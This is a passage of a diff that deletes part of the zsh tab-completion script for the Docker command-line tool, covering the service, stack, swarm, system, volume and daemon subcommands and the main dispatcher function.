-        "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories"
-    )
-
-    case "$words[1]" in
-        (create)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                $opts_create_update \
-                "($help)*--container-label=[Container labels]:label: " \
-                "($help)*--dns=[Set custom DNS servers]:DNS: " \
-                "($help)*--dns-option=[Set DNS options]:DNS option: " \
-                "($help)*--dns-search=[Set custom DNS search domains]:DNS search: " \
-                "($help)*--env-file=[Read environment variables from a file]:environment file:_files" \
-                "($help)--mode=[Service Mode]:mode:(global replicated)" \
-                "($help)--name=[Service name]:name: " \
-                "($help)*--publish=[Publish a port]:port: " \
-                "($help -): :__docker_complete_images" \
-                "($help -):command: _command_names -e" \
-                "($help -)*::arguments: _normal" && ret=0
-            ;;
-        (inspect)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
-                "($help)--pretty[Print the information in a human friendly format]" \
-                "($help -)*:service:__docker_complete_services" && ret=0
-            ;;
-        (ls|list)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:->filter-options" \
-                "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0
-            case $state in
-                (filter-options)
-                    __docker_service_complete_ls_filters && ret=0
-                    ;;
-            esac
-            ;;
-        (rm|remove)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)*:service:__docker_complete_services" && ret=0
-            ;;
-        (scale)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -)*:service:->values" && ret=0
-            case $state in
-                (values)
-                    if compset -P '*='; then
-                        _message 'replicas' && ret=0
-                    else
-                        __docker_complete_services -qS "="
-                    fi
-                    ;;
-            esac
-            ;;
-        (ps)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \
-                "($help)--no-resolve[Do not map IDs to Names]" \
-                "($help)--no-trunc[Do not truncate output]" \
-                "($help -q --quiet)"{-q,--quiet}"[Only display task IDs]" \
-                "($help -)1:service:__docker_complete_services" && ret=0
-            case $state in
-                (filter-options)
-                    __docker_service_complete_ps_filters && ret=0
-                    ;;
-            esac
-            ;;
-        (update)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                $opts_create_update \
-                "($help)--arg=[Service command args]:arguments: _normal" \
-                "($help)*--container-label-add=[Add or update container labels]:label: " \
-                "($help)*--container-label-rm=[Remove a container label by its key]:label: " \
-                "($help)*--dns-add=[Add or update custom DNS servers]:DNS: " \
-                "($help)*--dns-rm=[Remove custom DNS servers]:DNS: " \
-                "($help)*--dns-option-add=[Add or update DNS options]:DNS option: " \
-                "($help)*--dns-option-rm=[Remove DNS options]:DNS option: " \
-                "($help)*--dns-search-add=[Add or update custom DNS search domains]:DNS search: " \
-                "($help)*--dns-search-rm=[Remove DNS search domains]:DNS search: " \
-                "($help)--force[Force update]" \
-                "($help)*--group-add=[Add additional supplementary user groups to the container]:group:_groups" \
-                "($help)*--group-rm=[Remove previously added supplementary user groups from the container]:group:_groups" \
-                "($help)--image=[Service image tag]:image:__docker_complete_repositories" \
-                "($help)*--publish-add=[Add or update a port]:port: " \
-                "($help)*--publish-rm=[Remove a port(target-port mandatory)]:port: " \
-                "($help)--rollback[Rollback to previous specification]" \
-                "($help -)1:service:__docker_complete_services" && ret=0
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_service_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-# EO service
-
-# BO stack
-
-__docker_stack_complete_ps_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (desired-state)
-                state_opts=('accepted' 'running')
-                _describe -t state-opts "desired state options" state_opts && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        opts=('desired-state' 'id' 'name')
-        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_stack_complete_services_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        opts=('id' 'label' 'name')
-        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_stacks() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    local line s
-    declare -a lines stacks
-
-    lines=(${(f)${:-"$(_call_program commands docker $docker_options stack ls)"$'\n'}})
-
-    # Parse header line to find columns
-    local i=1 j=1 k header=${lines[1]}
-    declare -A begin end
-    while (( j < ${#header} - 1 )); do
-        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
-        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
-        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
-        begin[${header[$i,$((j-1))]}]=$i
-        end[${header[$i,$((j-1))]}]=$k
-    done
-    end[${header[$i,$((j-1))]}]=-1
-    lines=(${lines[2,-1]})
-
-    # Service ID
-    for line in $lines; do
-        s="${line[${begin[ID]},${end[ID]}]%% ##}"
-        stacks=($stacks $s)
-    done
-
-    _describe -t stacks-list "stacks" stacks "$@" && ret=0
-    return ret
-}
-
-__docker_complete_stacks() {
-    [[ $PREFIX = -* ]] && return 1
-    __docker_stacks "$@"
-}
-
-__docker_stack_commands() {
-    local -a _docker_stack_subcommands
-    _docker_stack_subcommands=(
-        "deploy:Deploy a new stack or update an existing stack"
-        "ls:List stacks"
-        "ps:List the tasks in the stack"
-        "rm:Remove the stack"
-        "services:List the services in the stack"
-    )
-    _describe -t docker-stack-commands "docker stack command" _docker_stack_subcommands
-}
-
-__docker_stack_subcommand() {
-    local -a _command_args opts_help
-    local expl help="--help"
-    integer ret=1
-
-    opts_help=("(: -)--help[Print usage]")
-
-    case "$words[1]" in
-        (deploy|up)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)--bundle-file=[Path to a Distributed Application Bundle file]:dab:_files -g \"*.dab\"" \
-                "($help -c --compose-file)"{-c=,--compose-file=}"[Path to a Compose file]:compose file:_files -g \"*.(yml|yaml)\"" \
-                "($help)--with-registry-auth[Send registry authentication details to Swarm agents]" \
-                "($help -):stack:__docker_complete_stacks" && ret=0
-            ;;
-        (ls|list)
-            _arguments $(__docker_arguments) \
-                $opts_help && ret=0
-            ;;
-        (ps)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -a --all)"{-a,--all}"[Display all tasks]" \
-                "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_ps_filters" \
-                "($help)--no-resolve[Do not map IDs to Names]" \
-                "($help)--no-trunc[Do not truncate output]" \
-                "($help -):stack:__docker_complete_stacks" && ret=0
-            ;;
-        (rm|remove|down)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -):stack:__docker_complete_stacks" && ret=0
-            ;;
-        (services)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_services_filters" \
-                "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" \
-                "($help -):stack:__docker_complete_stacks" && ret=0
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_stack_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-# EO stack
-
-# BO swarm
-
-__docker_swarm_commands() {
-    local -a _docker_swarm_subcommands
-    _docker_swarm_subcommands=(
-        "init:Initialize a swarm"
-        "join:Join a swarm as a node and/or manager"
-        "join-token:Manage join tokens"
-        "leave:Leave a swarm"
-        "update:Update the swarm"
-    )
-    _describe -t docker-swarm-commands "docker swarm command" _docker_swarm_subcommands
-}
-
-__docker_swarm_subcommand() {
-    local -a _command_args opts_help
-    local expl help="--help"
-    integer ret=1
-
-    opts_help=("(: -)--help[Print usage]")
-
-    case "$words[1]" in
-        (init)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)--advertise-addr[Advertised address]:ip\:port: " \
-                "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \
-                "($help)--force-new-cluster[Force create a new cluster from current state]" \
-                "($help)--listen-addr=[Listen address]:ip\:port: " \
-                "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \
-                "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \
-                "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0
-            ;;
-        (join)
-            _arguments $(__docker_arguments) -A '-*' \
-                $opts_help \
-                "($help)--advertise-addr=[Advertised address]:ip\:port: " \
-                "($help)--availability=[Availability of the node]:availability:(active drain pause)" \
-                "($help)--listen-addr=[Listen address]:ip\:port: " \
-                "($help)--token=[Token for entry into the swarm]:secret: " \
-                "($help -):host\:port: " && ret=0
-            ;;
-        (join-token)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -q --quiet)"{-q,--quiet}"[Only display token]" \
-                "($help)--rotate[Rotate join token]" \
-                "($help -):role:(manager worker)" && ret=0
-            ;;
-        (leave)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --force)"{-f,--force}"[Force this node to leave the swarm, ignoring warnings]" && ret=0
-            ;;
-        (update)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)--cert-expiry=[Validity period for node certificates]:duration: " \
-                "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \
-                "($help)--dispatcher-heartbeat=[Dispatcher heartbeat period]:duration: " \
-                "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \
-                "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \
-                "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_network_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-# EO swarm
-
-# BO system
-
-__docker_system_commands() {
-    local -a _docker_system_subcommands
-    _docker_system_subcommands=(
-        "df:Show docker filesystem usage"
-        "events:Get real time events from the server"
-        "info:Display system-wide information"
-        "prune:Remove unused data"
-    )
-    _describe -t docker-system-commands "docker system command" _docker_system_subcommands
-}
-
-__docker_system_subcommand() {
-    local -a _command_args opts_help
-    local expl help="--help"
-    integer ret=1
-
-    opts_help=("(: -)--help[Print usage]")
-
-    case "$words[1]" in
-        (df)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -v --verbose)"{-v,--verbose}"[Show detailed information on space usage]" && ret=0
-            ;;
-        (events)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_events_filter" \
-                "($help)--since=[Events created since this timestamp]:timestamp: " \
-                "($help)--until=[Events created until this timestamp]:timestamp: " \
-                "($help)--format=[Format the output using the given go template]:template: " && ret=0
-            ;;
-        (info)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0
-            ;;
-        (prune)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -a --all)"{-a,--all}"[Remove all unused data, not just dangling ones]" \
-                "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \
-                "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_volume_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-# EO system
-
-# BO volume
-
-__docker_volume_complete_ls_filters() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-
-    if compset -P '*='; then
-        case "${${words[-1]%=*}#*=}" in
-            (dangling)
-                dangling_opts=('true' 'false')
-                _describe -t dangling-filter-opts "Dangling Filter Options" dangling_opts && ret=0
-                ;;
-            (driver)
-                __docker_complete_info_plugins Volume && ret=0
-                ;;
-            (name)
-                __docker_complete_volumes && ret=0
-                ;;
-            *)
-                _message 'value' && ret=0
-                ;;
-        esac
-    else
-        opts=('dangling' 'driver' 'label' 'name')
-        _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0
-    fi
-
-    return ret
-}
-
-__docker_complete_volumes() {
-    [[ $PREFIX = -* ]] && return 1
-    integer ret=1
-    declare -a lines volumes
-
-    lines=(${(f)${:-"$(_call_program commands docker $docker_options volume ls)"$'\n'}})
-
-    # Parse header line to find columns
-    local i=1 j=1 k header=${lines[1]}
-    declare -A begin end
-    while (( j < ${#header} - 1 )); do
-        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
-        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
-        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
-        begin[${header[$i,$((j-1))]}]=$i
-        end[${header[$i,$((j-1))]}]=$k
-    done
-    end[${header[$i,$((j-1))]}]=-1
-    lines=(${lines[2,-1]})
-
-    # Names
-    local line s
-    for line in $lines; do
-        s="${line[${begin[VOLUME NAME]},${end[VOLUME NAME]}]%% ##}"
-        s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}"
-        volumes=($volumes $s)
-    done
-
-    _describe -t volumes-list "volumes" volumes && ret=0
-    return ret
-}
-
-__docker_volume_commands() {
-    local -a _docker_volume_subcommands
-    _docker_volume_subcommands=(
-        "create:Create a volume"
-        "inspect:Display detailed information on one or more volumes"
-        "ls:List volumes"
-        "prune:Remove all unused volumes"
-        "rm:Remove one or more volumes"
-    )
-    _describe -t docker-volume-commands "docker volume command" _docker_volume_subcommands
-}
-
-__docker_volume_subcommand() {
-    local -a _command_args opts_help
-    local expl help="--help"
-    integer ret=1
-
-    opts_help=("(: -)--help[Print usage]")
-
-    case "$words[1]" in
-        (create)
-            _arguments $(__docker_arguments) -A '-*' \
-                $opts_help \
-                "($help -d --driver)"{-d=,--driver=}"[Volume driver name]:Driver name:(local)" \
-                "($help)*--label=[Set metadata for a volume]:label=value: " \
-                "($help)*"{-o=,--opt=}"[Driver specific options]:Driver option: " \
-                "($help -)1:Volume name: " && ret=0
-            ;;
-        (inspect)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
-                "($help -)1:volume:__docker_complete_volumes" && ret=0
-            ;;
-        (ls)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \
-                "($help)--format=[Pretty-print volumes using a Go template]:template: " \
-                "($help -q --quiet)"{-q,--quiet}"[Only display volume names]" && ret=0
-            case $state in
-                (filter-options)
-                    __docker_volume_complete_ls_filters && ret=0
-                    ;;
-            esac
-            ;;
-        (prune)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0
-            ;;
-        (rm)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --force)"{-f,--force}"[Force the removal of one or more volumes]" \
-                "($help -):volume:__docker_complete_volumes" && ret=0
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_volume_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-# EO volume
-
-__docker_caching_policy() {
-  oldp=( "$1"(Nmh+1) )     # 1 hour
-  (( $#oldp ))
-}
-
-__docker_commands() {
-    local cache_policy
-
-    zstyle -s ":completion:${curcontext}:" cache-policy cache_policy
-    if [[ -z "$cache_policy" ]]; then
-        zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy
-    fi
-
-    if ( [[ ${+_docker_subcommands} -eq 0 ]] || _cache_invalid docker_subcommands) \
-        && ! _retrieve_cache docker_subcommands;
-    then
-        local -a lines
-        lines=(${(f)"$(_call_program commands docker 2>&1)"})
-        _docker_subcommands=(${${${(M)${lines[$((${lines[(i)*Commands:]} + 1)),-1]}:# *}## #}/ ##/:})
-        _docker_subcommands=($_docker_subcommands 'daemon:Enable daemon mode' 'help:Show help for a command')
-        (( $#_docker_subcommands > 2 )) && _store_cache docker_subcommands _docker_subcommands
-    fi
-    _describe -t docker-commands "docker command" _docker_subcommands
-}
-
-__docker_subcommand() {
-    local -a _command_args opts_help
-    local expl help="--help"
-    integer ret=1
-
-    opts_help=("(: -)--help[Print usage]")
-
-    case "$words[1]" in
-        (attach|commit|cp|create|diff|exec|export|kill|logs|pause|unpause|port|rename|restart|rm|run|start|stats|stop|top|update|wait)
-            __docker_container_subcommand && ret=0
-            ;;
-        (build|history|import|load|pull|push|save|tag)
-            __docker_image_subcommand && ret=0
-            ;;
-        (container)
-            local curcontext="$curcontext" state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -): :->command" \
-                "($help -)*:: :->option-or-argument" && ret=0
-
-            case $state in
-                (command)
-                    __docker_container_commands && ret=0
-                    ;;
-                (option-or-argument)
-                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
-                    __docker_container_subcommand && ret=0
-                    ;;
-            esac
-            ;;
-        (daemon)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help)*--add-runtime=[Register an additional OCI compatible runtime]:runtime:__docker_complete_runtimes" \
-                "($help)--api-cors-header=[CORS headers in the Engine API]:CORS headers: " \
-                "($help)*--authorization-plugin=[Authorization plugins to load]" \
-                "($help -b --bridge)"{-b=,--bridge=}"[Attach containers to a network bridge]:bridge:_net_interfaces" \
-                "($help)--bip=[Network bridge IP]:IP address: " \
-                "($help)--cgroup-parent=[Parent cgroup for all containers]:cgroup: " \
-                "($help)--cluster-advertise=[Address or interface name to advertise]:Instance to advertise (host\:port): " \
-                "($help)--cluster-store=[URL of the distributed storage backend]:Cluster Store:->cluster-store" \
-                "($help)*--cluster-store-opt=[Cluster store options]:Cluster options:->cluster-store-options" \
-                "($help)--config-file=[Path to daemon configuration file]:Config File:_files" \
-                "($help)--containerd=[Path to containerd socket]:socket:_files -g \"*.sock\"" \
-                "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \
-                "($help)--default-gateway[Container default gateway IPv4 address]:IPv4 address: " \
-                "($help)--default-gateway-v6[Container default gateway IPv6 address]:IPv6 address: " \
-                "($help)*--default-ulimit=[Default ulimits for containers]:ulimit: " \
-                "($help)--disable-legacy-registry[Disable contacting legacy registries]" \
-                "($help)*--dns=[DNS server to use]:DNS: " \
-                "($help)*--dns-opt=[DNS options to use]:DNS option: " \
-                "($help)*--dns-search=[DNS search domains to use]:DNS search: " \
-                "($help)*--exec-opt=[Runtime execution options]:runtime execution options: " \
-                "($help)--exec-root=[Root directory for execution state files]:path:_directories" \
-                "($help)--experimental[Enable experimental features]" \
-                "($help)--fixed-cidr=[IPv4 subnet for fixed IPs]:IPv4 subnet: " \
-                "($help)--fixed-cidr-v6=[IPv6 subnet for fixed IPs]:IPv6 subnet: " \
-                "($help -G --group)"{-G=,--group=}"[Group for the unix socket]:group:_groups" \
-                "($help -g --graph)"{-g=,--graph=}"[Root of the Docker runtime]:path:_directories" \
-                "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \
-                "($help)--icc[Enable inter-container communication]" \
-                "($help)--init[Run an init inside containers to forward signals and reap processes]" \
-                "($help)--init-path=[Path to the docker-init binary]:docker-init binary:_files" \
-                "($help)*--insecure-registry=[Enable insecure registry communication]:registry: " \
-                "($help)--ip=[Default IP when binding container ports]" \
-                "($help)--ip-forward[Enable net.ipv4.ip_forward]" \
-                "($help)--ip-masq[Enable IP masquerading]" \
-                "($help)--iptables[Enable addition of iptables rules]" \
-                "($help)--ipv6[Enable IPv6 networking]" \
-                "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \
-                "($help)*--label=[Key=value labels]:label: " \
-                "($help)--live-restore[Enable live restore of docker when containers are still running]" \
-                "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers" \
-                "($help)*--log-opt=[Default log driver options for containers]:log driver options:__docker_complete_log_options" \
-                "($help)--max-concurrent-downloads[Set the max concurrent downloads for each pull]" \
-                "($help)--max-concurrent-uploads[Set the max concurrent uploads for each push]" \
-                "($help)--mtu=[Network MTU]:mtu:(0 576 1420 1500 9000)" \
-                "($help)--oom-score-adjust=[Set the oom_score_adj for the daemon]:oom-score:(-500)" \
-                "($help -p --pidfile)"{-p=,--pidfile=}"[Path to use for daemon PID file]:PID file:_files" \
-                "($help)--raw-logs[Full timestamps without ANSI coloring]" \
-                "($help)*--registry-mirror=[Preferred Docker registry mirror]:registry mirror: " \
-                "($help)--seccomp-profile=[Path to seccomp profile]:path:_files -g \"*.json\"" \
-                "($help -s --storage-driver)"{-s=,--storage-driver=}"[Storage driver to use]:driver:(aufs btrfs devicemapper overlay overlay2 vfs zfs)" \
-                "($help)--selinux-enabled[Enable selinux support]" \
-                "($help)--shutdown-timeout=[Set the shutdown timeout value in seconds]:time: " \
-                "($help)*--storage-opt=[Storage driver options]:storage driver options: " \
-                "($help)--tls[Use TLS]" \
-                "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g \"*.(pem|crt)\"" \
-                "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g \"*.(pem|crt)\"" \
-                "($help)--tlskey=[Path to TLS key file]:Key file:_files -g \"*.(pem|key)\"" \
-                "($help)--tlsverify[Use TLS and verify the remote]" \
-                "($help)--userns-remap=[User/Group setting for user namespaces]:user\:group:->users-groups" \
-                "($help)--userland-proxy[Use userland proxy for loopback traffic]" \
-                "($help)--userland-proxy-path=[Path to the userland proxy binary]:binary:_files" && ret=0
-
-            case $state in
-                (cluster-store)
-                    if compset -P '*://'; then
-                        _message 'host:port' && ret=0
-                    else
-                        store=('consul' 'etcd' 'zk')
-                        _describe -t cluster-store "Cluster Store" store -qS "://" && ret=0
-                    fi
-                    ;;
-                (cluster-store-options)
-                    if compset -P '*='; then
-                        _files && ret=0
-                    else
-                        opts=('discovery.heartbeat' 'discovery.ttl' 'kv.cacertfile' 'kv.certfile' 'kv.keyfile' 'kv.path')
-                        _describe -t cluster-store-opts "Cluster Store Options" opts -qS "=" && ret=0
-                    fi
-                    ;;
-                (users-groups)
-                    if compset -P '*:'; then
-                        _groups && ret=0
-                    else
-                        _describe -t userns-default "default Docker user management" '(default)' && ret=0
-                        _users && ret=0
-                    fi
-                    ;;
-            esac
-            ;;
-        (events|info)
-            __docker_system_subcommand && ret=0
-            ;;
-        (image)
-            local curcontext="$curcontext" state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -): :->command" \
-                "($help -)*:: :->option-or-argument" && ret=0
-
-            case $state in
-                (command)
-                    __docker_image_commands && ret=0
-                    ;;
-                (option-or-argument)
-                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
-                    __docker_image_subcommand && ret=0
-                    ;;
-            esac
-            ;;
-        (images)
-            words[1]='ls'
-            __docker_image_subcommand && ret=0
-            ;;
-        (inspect)
-            local state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
-                "($help -s --size)"{-s,--size}"[Display total file sizes if the type is container]" \
-                "($help)--type=[Return JSON for specified type]:type:(container image network node plugin service volume)" \
-                "($help -)*: :->values" && ret=0
-
-            case $state in
-                (values)
-                    if [[ ${words[(r)--type=container]} == --type=container ]]; then
-                        __docker_complete_containers && ret=0
-                    elif [[ ${words[(r)--type=image]} == --type=image ]]; then
-                        __docker_complete_images && ret=0
-                    elif [[ ${words[(r)--type=network]} == --type=network ]]; then
-                        __docker_complete_networks && ret=0
-                    elif [[ ${words[(r)--type=node]} == --type=node ]]; then
-                        __docker_complete_nodes && ret=0
-                    elif [[ ${words[(r)--type=plugin]} == --type=plugin ]]; then
-                        __docker_complete_plugins && ret=0
-                    elif [[ ${words[(r)--type=service]} == --type=service ]]; then
-                        __docker_complete_services && ret=0
-                    elif [[ ${words[(r)--type=volume]} == --type=volume ]]; then
-                        __docker_complete_volumes && ret=0
-                    else
-                        __docker_complete_containers
-                        __docker_complete_images
-                        __docker_complete_networks
-                        __docker_complete_nodes
-                        __docker_complete_plugins
-                        __docker_complete_services
-                        __docker_complete_volumes && ret=0
-                    fi
-                    ;;
-            esac
-            ;;
-        (login)
-            _arguments $(__docker_arguments) -A '-*' \
-                $opts_help \
-                "($help -p --password)"{-p=,--password=}"[Password]:password: " \
-                "($help -u --user)"{-u=,--user=}"[Username]:username: " \
-                "($help -)1:server: " && ret=0
-            ;;
-        (logout)
-            _arguments $(__docker_arguments) -A '-*' \
-                $opts_help \
-                "($help -)1:server: " && ret=0
-            ;;
-        (network)
-            local curcontext="$curcontext" state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -): :->command" \
-                "($help -)*:: :->option-or-argument" && ret=0
-
-            case $state in
-                (command)
-                    __docker_network_commands && ret=0
-                    ;;
-                (option-or-argument)
-                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
-                    __docker_network_subcommand && ret=0
-                    ;;
-            esac
-            ;;
-        (node)
-            local curcontext="$curcontext" state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -): :->command" \
-                "($help -)*:: :->option-or-argument" && ret=0
-
-            case $state in
-                (command)
-                    __docker_node_commands && ret=0
-                    ;;
-                (option-or-argument)
-                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
-                    __docker_node_subcommand && ret=0
-                    ;;
-            esac
-            ;;
-        (plugin)
-            local curcontext="$curcontext" state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -): :->command" \
-                "($help -)*:: :->option-or-argument" && ret=0
-
-            case $state in
-                (command)
-                    __docker_plugin_commands && ret=0
-                    ;;
-                (option-or-argument)
-                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
-                    __docker_plugin_subcommand && ret=0
-                    ;;
-            esac
-            ;;
-        (ps)
-            words[1]='ls'
-            __docker_container_subcommand && ret=0
-            ;;
-        (rmi)
-            words[1]='rm'
-            __docker_image_subcommand && ret=0
-            ;;
-        (search)
-            _arguments $(__docker_arguments) -A '-*' \
-                $opts_help \
-                "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \
-                "($help)--limit=[Maximum returned search results]:limit:(1 5 10 25 50)" \
-                "($help)--no-trunc[Do not truncate output]" \
-                "($help -):term: " && ret=0
-
-            case $state in
-                (filter-options)
-                    __docker_complete_search_filters && ret=0
-                    ;;
-            esac
-            ;;
-        (secret)
-            local curcontext="$curcontext" state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -): :->command" \
-                "($help -)*:: :->option-or-argument" && ret=0
-
-            case $state in
-                (command)
-                    __docker_secret_commands && ret=0
-                    ;;
-                (option-or-argument)
-                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
-                    __docker_secret_subcommand && ret=0
-                    ;;
-            esac
-            ;;
-        (service)
-            local curcontext="$curcontext" state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -): :->command" \
-                "($help -)*:: :->option-or-argument" && ret=0
-
-            case $state in
-                (command)
-                    __docker_service_commands && ret=0
-                    ;;
-                (option-or-argument)
-                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
-                    __docker_service_subcommand && ret=0
-                    ;;
-            esac
-            ;;
-        (stack)
-            local curcontext="$curcontext" state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -): :->command" \
-                "($help -)*:: :->option-or-argument" && ret=0
-
-            case $state in
-                (command)
-                    __docker_stack_commands && ret=0
-                    ;;
-                (option-or-argument)
-                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
-                    __docker_stack_subcommand && ret=0
-                    ;;
-            esac
-            ;;
-        (swarm)
-            local curcontext="$curcontext" state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -): :->command" \
-                "($help -)*:: :->option-or-argument" && ret=0
-
-            case $state in
-                (command)
-                    __docker_swarm_commands && ret=0
-                    ;;
-                (option-or-argument)
-                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
-                    __docker_swarm_subcommand && ret=0
-                    ;;
-            esac
-            ;;
-        (system)
-            local curcontext="$curcontext" state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -): :->command" \
-                "($help -)*:: :->option-or-argument" && ret=0
-
-            case $state in
-                (command)
-                    __docker_system_commands && ret=0
-                    ;;
-                (option-or-argument)
-                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
-                    __docker_system_subcommand && ret=0
-                    ;;
-            esac
-            ;;
-        (version)
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0
-            ;;
-        (volume)
-            local curcontext="$curcontext" state
-            _arguments $(__docker_arguments) \
-                $opts_help \
-                "($help -): :->command" \
-                "($help -)*:: :->option-or-argument" && ret=0
-
-            case $state in
-                (command)
-                    __docker_volume_commands && ret=0
-                    ;;
-                (option-or-argument)
-                    curcontext=${curcontext%:*:*}:docker-${words[-1]}:
-                    __docker_volume_subcommand && ret=0
-                    ;;
-            esac
-            ;;
-        (help)
-            _arguments $(__docker_arguments) ":subcommand:__docker_commands" && ret=0
-            ;;
-    esac
-
-    return ret
-}
-
-_docker() {
-    # Support for subservices, which allows for `compdef _docker docker-shell=_docker_containers`.
-    # Based on /usr/share/zsh/functions/Completion/Unix/_git without support for `ret`.
-    if [[ $service != docker ]]; then
-        _call_function - _$service
-        return
-    fi
-
-    local curcontext="$curcontext" state line help="-h --help"
-    integer ret=1
-    typeset -A opt_args
-
